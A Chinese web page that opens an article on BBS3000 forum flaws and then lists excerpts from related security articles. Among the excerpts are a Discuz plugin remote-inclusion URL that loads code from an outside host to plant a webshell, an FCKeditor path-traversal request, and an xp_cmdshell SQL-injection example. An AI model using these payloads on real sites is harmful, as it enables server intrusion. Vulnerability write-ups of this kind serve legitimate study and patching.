BBS3000漏洞
****基本漏洞测试*****
YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛,
但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上
这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭
示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐
蔽和服务器的安全。
测试版本:bbs3000 v4.11
系统平台:win2k adv server=sp3 + iis 5.0 +ActivePerl 5.6.1.626
应用程序映射:perl.exe %s %s 动作:GET,HEAD,POST
或者:perlIS.dll 动作:GET,HEAD
相关推荐
-
BBS3000漏洞
****基本漏洞测试***** YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛, 但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上 这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭 示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐 蔽和服务器的安全. 测试版本:bbs3000 v4.11 系统平台:win2k adv server=sp3 + iis 5.0 +ActivePerl 5.6.1.626
-
如何防范PowerShell代码注入漏洞绕过受限语言模式
导语:受限语言模式是缓解PowerShell攻击的一种方式,能够阻止执行任意未签名的代码. 介绍 受限语言模式是缓解PowerShell攻击的一种方式,能够阻止执行任意未签名的代码.当Device Guard或者AppLocker处于强制模式时,它是最实际有效的强制安全措施,因为未被策略允许的任何脚本或者模块都位于受限语言模式下,这严重限制了攻击者执行未签名的代码.通过限制语言模式限制了Add-Type的调用.限制Add-Type明显是考虑到了它能编译并加载任意的C#代码到你的运行空间中去. 但
-
Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法
环境:Windows 2008 R2 + Oracle 10.2.0.3 应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675) •1.确定解决方案 •2.应用解决方案 •3.验证修补情况 •4.Reference 1.确定解决方案 安全厂家给出的解决办法: 链接:http://www.oracle.com/technetwork/topics/security/alert-c
-
对错误,漏洞和exploits的说明
作者:Mark Vogels 翻译:黯魂[S.S.T] 在这篇文档中,我将会试着为你提供一个对于错误,和由于那些错误而产生的漏洞以及它们的exploits的基本认识.那决不意味着能让你完全理解exploits和漏洞,但是能帮助你学会认识可能的漏洞以及怎样处理它们. 一般而言有3种不同类型的错误会可能危及计算机系统和网络的安全. #编程错误 #配置错误 #设计错误 错误可以被看成是失误,尽管它们并非都是由事故导致的.软件/设备的最初创建者可能就存在错误,用最好的想法却创建了错误,并且没有意
-
OBLOG4.0 OBLOG4.5漏洞利用分析
来源:Deepen Study 漏洞文件:js.asp <% Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request("n")) if n=0 then n=1 select case CInt(Request("j")) case 1 ca
-
discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy
-
GBK字符编码(字符集)缺陷导致web安全漏洞
多字节编码由来 我们先来看看最常用的,最小字符集是ascii,对应的二级制可以表示为:00-7F 编码 .它也是我们计算机使用最早通用的字符集.前期几乎可以表示所有英文字符.后来,更多使用计算机国家加入后,我们就想在计算机中表示中文字符.我们知道常见中文就有7000多个字符.ascii码就只有128字符,只有0-127编码位置,远远不够用了.因此,我们就开始制作更大字符集,并且保证兼容ascii编码.要支持更多字符,选择更大字符集.我们只能用多个字节来描述一个字符了.为了很好的与ascii码,区
-
ASP的chr(0)文件上传漏洞原理和解决方法介绍
我们在用ASP开发文件上传功能的时候,为了防止用户上传木马程序,常常会限制一些文件的上传,常用的方法是判断一下上传文件的扩展名是否符合规定,可以用right字符串函数取出上传文件的文件名的后四位,这样很容易就能判断了,但是这里面有一个漏洞,非常危险,就是chr(0)漏洞,详情请接着往下看. 一.首先解释下什么是chr(0)? 在ASP中可以用chr()函数调用ASCII码,其中chr(0)表示调用的是一个结束字符,简单的说当一个字符串中包含chr(0)字符时,只能输出chr(0)前面的字符,ch
-
FCKeditor 新闻组件的一些程序漏洞
1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录 /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 "../.
-
ASP漏洞全接触-高级篇
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了.但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇. 第一节.利用系统表注入SQLServer数据库 SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ①http://Site/url.asp?id=1;exec master..xp_cmdshell
随机推荐
- JavaScript的Backbone.js框架的一些使用建议整理
- 跨域请求之jQuery的ajax jsonp的使用解惑
- sql注入过程详解_动力节点Java学院整理
- jquery单选框radio绑定click事件实现方法
- Java 反射获取类详细信息的常用方法总结
- iOS开发 全机型适配解决方法
- js点击文本框后才加载验证码实例代码
- 浅谈本地WAMP环境的搭建
- Bootstrap项目实战之首页内容介绍(全)
- 使用Python绘制图表大全总结
- C#的泛型方法解析
- WPF中不规则窗体与WindowsFormsHost控件兼容问题的解决方法
- 亲自动手实现Android App插件化
- MySQL中VARCHAR与CHAR格式数据的区别
- Mysql事务操作失败如何解决
- jquery取消事件冒泡的三种方法(推荐)
- jQuery对象与DOM对象之间的转换方法
- c++归并排序详解
- 必须会的SQL语句(五) NULL数据处理和类型转换
- jQuery实现指定区域外单击关闭指定层的方法【经典】